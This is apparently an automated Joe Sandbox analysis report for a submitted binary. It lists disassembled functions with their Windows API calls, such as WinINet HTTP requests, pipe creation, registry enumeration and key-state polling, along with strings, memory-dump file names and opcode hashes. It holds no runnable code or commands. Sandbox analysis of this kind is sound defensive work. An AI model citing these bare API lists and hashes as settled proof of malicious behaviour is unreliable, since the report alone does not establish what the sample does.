Opcode Fuzzy Hash: d6c42b67778abc6468b9c5dff11391124f5a4cb3b0b40cd4613fbf54f9ef83bf
Instruction Fuzzy Hash: EF21D5B1A00104FBEF18AB64EC89DFFB768DF05350B14811DFA25A72E1DB3D490A9610

Function 007B1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B1B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B1B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007B1B96
InternetCloseHandle.WININET(00000000), ref: 007B1BDD

Part of subcall function 007B2777: GetLastError.KERNEL32(?,?,007B1B0B,00000000,00000000,00000001), ref: 007B278C
Part of subcall function 007B2777: SetEvent.KERNEL32(?,?,007B1B0B,00000000,00000000,00000001), ref: 007B27A1

Strings

, xrefs: 007B1B87

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: d5d290cd9a3c5df6848c9830adebc0057687e47c69f471bafc5621469c6f5805
Instruction ID: c63f26fe3634e651f7745f99c5b454a0ec668988b4d8159f0b08bf79cdc6fe79
Opcode Fuzzy Hash: d5d290cd9a3c5df6848c9830adebc0057687e47c69f471bafc5621469c6f5805
Instruction Fuzzy Hash: 42219DB1600208BFEB119F609CD9FFF77EDEB49744F90412EF505A6240EA289E0597B5

Function 007C6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00741D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00741D73
Part of subcall function 00741D35: GetStockObject.GDI32(00000011), ref: 00741D87
Part of subcall function 00741D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00741D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007C66D0
LoadLibraryW.KERNEL32(?), ref: 007C66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007C66EC
DestroyWindow.USER32(?), ref: 007C66F4

Strings

SysAnimate32, xrefs: 007C66AB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 39e685dc3cea26f774f29023fd5a67ac7800c7e96b4d4cf0e8da18fbb3267ad1
Instruction ID: b937948b3065570e207cd00cd7924e883f32caa4af0bdbc62f598a078d768e5e
Opcode Fuzzy Hash: 39e685dc3cea26f774f29023fd5a67ac7800c7e96b4d4cf0e8da18fbb3267ad1
Instruction Fuzzy Hash: BB2177B120020AABEF105E64ECC0FBB37ADEB59368F10462DFA10A21A0D779CC919761

Function 007A703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007A705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A7091
GetStdHandle.KERNEL32(0000000C), ref: 007A70A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007A70DD

Strings

nul, xrefs: 007A70D8

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 4e8c3ee4621983b4fcd647bc3a7ff138702c16da3236b5c6b09c1356c251924f
Instruction ID: a923c4743bd330a53fb7a71782eb78824f474b8597614b2a3698b2020cd16153
Opcode Fuzzy Hash: 4e8c3ee4621983b4fcd647bc3a7ff138702c16da3236b5c6b09c1356c251924f
Instruction Fuzzy Hash: 4B216274604209AFDB249F39DC05AAB77B8BF86720F208729FDA1D72D0E7749850CB54

Function 007A710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007A712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A715D
GetStdHandle.KERNEL32(000000F6), ref: 007A716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007A71A8

Strings

nul, xrefs: 007A71A3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 868e69173d2bb02e10d369eb3f208ce96aeba358897f26b32bf4d762fc56ea5f
Instruction ID: 64bde6a56acc971758be7316cfc8de15f711399fa09159654df914a4f3360cc4
Opcode Fuzzy Hash: 868e69173d2bb02e10d369eb3f208ce96aeba358897f26b32bf4d762fc56ea5f
Instruction Fuzzy Hash: 1C21B6755042099BDB289F68DC04EA9B7E8BFD6720F204B19FDA0D32D0E7749841C755

Function 007AAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AAEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007AAF13
__swprintf.LIBCMT ref: 007AAF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,007CF910), ref: 007AAF6A

Strings

%lu, xrefs: 007AAF26

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: c5bce20e773f8181861ca9a268f6453ccd151a5d2bbf8ff53a1fa85745247362
Instruction ID: ef00a15c492345c7e8c267871aaa0b4f8b08d1deddfc27e4cdbecbf6210b8054
Opcode Fuzzy Hash: c5bce20e773f8181861ca9a268f6453ccd151a5d2bbf8ff53a1fa85745247362
Instruction Fuzzy Hash: 78215370A0010DEFCB10DF65CD89DAE7BB9EF89704B108069F909EB251DB75EA41CB61

Function 0079A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

Part of subcall function 0079A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079A399
Part of subcall function 0079A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079A3AC
Part of subcall function 0079A37C: GetCurrentThreadId.KERNEL32 ref: 0079A3B3
Part of subcall function 0079A37C: AttachThreadInput.USER32(00000000), ref: 0079A3BA

GetFocus.USER32 ref: 0079A554

Part of subcall function 0079A3C5: GetParent.USER32(?), ref: 0079A3D3

GetClassNameW.USER32(?,?,00000100), ref: 0079A59D
EnumChildWindows.USER32(?,0079A615), ref: 0079A5C5
__swprintf.LIBCMT ref: 0079A5DF

Strings

%s%d, xrefs: 0079A5D9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 713a37d3555bbcaadc54cf697a0dfbdda9dc86767ef1457cff3b755355587b8c
Instruction ID: b508513256b911fcf845bac9eb7b13072a8fe9a9dad7435218c2ffc59710cf73
Opcode Fuzzy Hash: 713a37d3555bbcaadc54cf697a0dfbdda9dc86767ef1457cff3b755355587b8c
Instruction Fuzzy Hash: 76119D71601209BBDF10BF70EC89FEA3779AF49700F044079FA08AA152CB7859458BB5

Function 007A2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007A2048

Strings

REMOVE, xrefs: 007A204E
KEYS, xrefs: 007A205F
EXISTS, xrefs: 007A2070
APPEND, xrefs: 007A2081

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 3891c086e4dfbd63acf5318c1fb7737d9d6c24aa0dd47713dfc28371185be652
Instruction ID: a1761c3c198c9dd88953fea82f2920920202bfe87c6036ebf602d632678b78cc
Opcode Fuzzy Hash: 3891c086e4dfbd63acf5318c1fb7737d9d6c24aa0dd47713dfc28371185be652
Instruction Fuzzy Hash: 2C110C7091010DEFCF00EFA8D9514FEB7B4BF56304B508669E95667352DB3A5907CB50

Function 007BEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007BEF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 007BEF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007BF07E
CloseHandle.KERNEL32(?), ref: 007BF0FF

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: bc9402cfd9038c2c4653645b3b7594bee12aafa5b5b816f8bce3b3bc480ad011
Instruction ID: 917403c96d2cb6552651be404c6401965444c34bf92ef2c26c3aee7f7a965015
Opcode Fuzzy Hash: bc9402cfd9038c2c4653645b3b7594bee12aafa5b5b816f8bce3b3bc480ad011
Instruction Fuzzy Hash: 89812F716047119FD720EF28C88AB6AB7E5AF88B10F14881DF5959B392DB78AD408B51

Function 007C02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Part of subcall function 007C10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C0038,?,?), ref: 007C10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007C040E
RegCloseKey.ADVAPI32(?,?), ref: 007C043A
RegCloseKey.ADVAPI32(00000000), ref: 007C0447

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 572af0fc282d11d08d7693d49ac09db54502cf4ee3c521df10e386947e784ebc
Instruction ID: 17f08284faba3437e000bc1ef8cf24156504fc4da2c2815867174515bf84fb5a
Opcode Fuzzy Hash: 572af0fc282d11d08d7693d49ac09db54502cf4ee3c521df10e386947e784ebc
Instruction Fuzzy Hash: 1A516871208240EFC704EB64C885F6BB7E9FF84704F44892DF595872A2DB38E904CB92

Function 007AE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007AE88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007AE8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007AE8F2

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007AE917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007AE91F

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 24fc3a37df36eef39da43191fa88d803dee51798d17f3e192de797107ed89e52
Instruction ID: 6adf26e3f3871fa23eec1d604818fb618601751ffd4afdec62b94a36b0dfcfed
Opcode Fuzzy Hash: 24fc3a37df36eef39da43191fa88d803dee51798d17f3e192de797107ed89e52
Instruction Fuzzy Hash: 34513C35A00205DFCF01EF64C985AAEBBF5FF49310B1480A9E949AB362CB39ED11DB51

Function 007CA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b967f55660792fecb01f112a8adcd2cddb6b604816c219b51fa30ec06823ad
Instruction ID: bed551a4e037207a396cb196b228057381cf19079c6c0481e9cbf3505e325f20
Opcode Fuzzy Hash: c6b967f55660792fecb01f112a8adcd2cddb6b604816c219b51fa30ec06823ad
Instruction Fuzzy Hash: 4241133590028CBFC720DB28CC58FA9BBA5FB09316F14426DF915A72E0D738AE51DA51

Function 00742344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00742357
ScreenToClient.USER32(008067B0,?), ref: 00742374
GetAsyncKeyState.USER32(00000001), ref: 00742399
GetAsyncKeyState.USER32(00000002), ref: 007423A7

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: ec1abf910f6cf7121dd9495d5c8054542fcee2a3085305575a9947c56b65f356
Instruction ID: 99443f3ba2714374a64d6e1600daf4e93d6aa6069f8ec0c4d4c56c11e84155df
Opcode Fuzzy Hash: ec1abf910f6cf7121dd9495d5c8054542fcee2a3085305575a9947c56b65f356
Instruction Fuzzy Hash: 52418371604119FBDF169F64C848EEDBB74FB09360F60836EF92896291C7385960DB91

Function 00796920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0079695D
TranslateAcceleratorW.USER32(?,?,?), ref: 007969A9
TranslateMessage.USER32(?), ref: 007969D2
DispatchMessageW.USER32(?), ref: 007969DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007969EB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: baf2f1df87e29a43cee0574bdd3a2f0b0935591668784c43afa861f86e512ea3
Instruction ID: b9f7db4e434d4eda836ac2d717dcbaeb5b04bb5c4796f959319459f6a04e8061
Opcode Fuzzy Hash: baf2f1df87e29a43cee0574bdd3a2f0b0935591668784c43afa861f86e512ea3
Instruction Fuzzy Hash: 2631A171904246AEDF60CF74AC44FB67BACFB01324F14836DE421D61A1E73DA8A5D7A0

Function 00798F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00798F12
PostMessageW.USER32(?,00000201,00000001), ref: 00798FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00798FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00798FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00798FDA

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 5a2ca293252baa8c49d9e0e3229a8242e05c884d8d6f33e8b6fe4d98d40ace50
Instruction ID: 3bbf6822114c9c590751a835af2c70b4ba75677bdec589b94a363f981551c43b
Opcode Fuzzy Hash: 5a2ca293252baa8c49d9e0e3229a8242e05c884d8d6f33e8b6fe4d98d40ace50
Instruction Fuzzy Hash: BD31E071500219EFDF00CF68E94CA9E7BB7EB05315F108229F925EA2D0C7B89910CB91

Function 0079B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0079B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0079B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0079B742
_wcsstr.LIBCMT ref: 0079B74C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 57bb4563685b71a978af64f6357916e74e7a29496bcde6a7542c1db9f782b7d5
Instruction ID: 5e343c0832524ebb0b7a213e6ae5f0c5b6c87d91b895e218bb82d2ece334bf39
Opcode Fuzzy Hash: 57bb4563685b71a978af64f6357916e74e7a29496bcde6a7542c1db9f782b7d5
